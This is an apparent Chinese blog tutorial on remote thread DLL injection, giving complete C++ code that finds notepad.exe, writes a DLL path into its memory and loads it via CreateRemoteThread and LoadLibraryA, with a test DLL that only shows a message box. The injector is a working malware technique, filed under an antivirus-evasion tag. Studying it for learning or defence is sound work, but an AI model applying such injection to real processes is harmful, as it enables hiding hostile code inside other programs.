0
点赞
收藏
分享

微信扫一扫

远程线程注入

左手梦圆 2022-05-04 阅读 39
c++免杀

远程线程注入

远程线程注入是最基础的一种注入方式,因为其调用了CreateRemoteThread()函数而得名。但是因为其是最基础的注入方式,调用了windows API而特征明显,所以非常容易被检测出来。

这次的实验对象是notepad.exe

#include <Windows.h>
#include <stdio.h>
#include <TlHelp32.h>
#include <iostream>
using namespace std;

BOOL CreateRemoteThreadInjectDll(DWORD dwProcessId, char* pszDllFileName);
DWORD find_process(char* process_name);

int main() {
    char* dllPath = "C:\\Users\\w\\source\\repos\\QuickDll\\x64\\Debug\\QuickDll.dll";
    char* process = "notepad.exe";

    DWORD process_id = find_process(process);
    if (process_id != 0)printf("%s process_id is %d\n",process, process_id);

    BOOL b = CreateRemoteThreadInjectDll(process_id, dllPath);
    cout << b; 

    return 0;
}

首先是一个大致的框架,下面就一个一个讲解

DWORD find_process(char* process_name) {

    PROCESSENTRY32 process_entry;
    process_entry.dwSize = sizeof(PROCESSENTRY32);

    //get the list of processes
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    //check processes to find TARGET_PROCESS_NAME
    if (Process32First(snapshot, &process_entry) == TRUE) {

        while (Process32Next(snapshot, &process_entry) == TRUE) {
            if (stricmp(process_entry.szExeFile, process_name) == 0) {
                cout << "process_entry.szExeFile is" << *process_entry.szExeFile << endl;
                CloseHandle(snapshot);
                return process_entry.th32ProcessID;
            }
        }
    }

    CloseHandle(snapshot);
    return 0;
}

首先最先用到的是find_process(char* process_name)函数,因为我们是要把我们写好的DLL注入到远程线程里。所以要先找到进程❗注意是进程不是线程哦。

CreateToolhelp32Snapshot函数会保存当时进程的快照

剩下的应该没啥好说的了可读性还是蛮好的,就是记得关闭句柄CloseHandle(snapshot)

接下来就是注入了

BOOL CreateRemoteThreadInjectDll(DWORD dwProcessId,char* pszDllFileName) {
    HANDLE hProcess = NULL;
    SIZE_T dwSize = 0;
    LPVOID pDllAddr = NULL;
    FARPROC pFuncProcAddr = NULL;

    // 打开注入的进程
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
    if (NULL == hProcess) {
        printf("Error OpenProcess,%d", GetLastError());
        return FALSE;
    }

    // 在注入进程中申请内存
    dwSize = 1 + strlen(pszDllFileName);
    pDllAddr = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
    if (pDllAddr == NULL) {
        printf("Error VirtualAllocEx,%d", GetLastError());
        return FALSE;
    }

    // 向申请的内存中写入数据
    if (FALSE == WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL)) {
        printf("Error WriteProcessMemory,%d", GetLastError());
        return FALSE;
    }

    // 获取LoadLibraryA函数地址
    pFuncProcAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
    if (NULL == pFuncProcAddr) {
        printf("Error GetProcAddress,%d", GetLastError());
        return FALSE;
    }

    // CreateRemoteThreadc创建远程线程,实现dll注入
    HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, NULL);
    if (NULL == hRemoteThread) {
        printf("Error CreateRemoteThread,%d", GetLastError());
        return FALSE;
    }

    CloseHandle(hProcess);
    return TRUE;
}

这代码可读性太好了以至于我实在不知道该怎么讲?就把各个可能不熟悉的API文档放进来吧

  • OpenProcess | Microsoft Docs
  • VirtualAllocEx | Microsoft Docs
  • WriteProcessMemory | Microsoft Docs
  • GetProcAddress | Microsoft Docs
  • CreateRemoteThread function (processthreadsapi.h) - Win32 apps | Microsoft Docs

然后DLL也是非常的简单

#include "pch.h"

extern "C" __declspec(dllexport) void HelloWorld();

//核心入口函数 DLL入口函数 
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH://当DLL被进程加载时
        HelloWorld();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

void HelloWorld()
{
    MessageBox(NULL, "Success", "Message", MB_YESNO);
}

稍微能讲一讲的就只有extern "C" __declspec(dllexport) void HelloWorld();

这是通过C的方式编译,因为通过C++ 编译出来的函数名有点奇怪。但是跟本篇又没啥关系。感兴趣的话自行百度扩展一下吧。

举报

相关推荐

0 条评论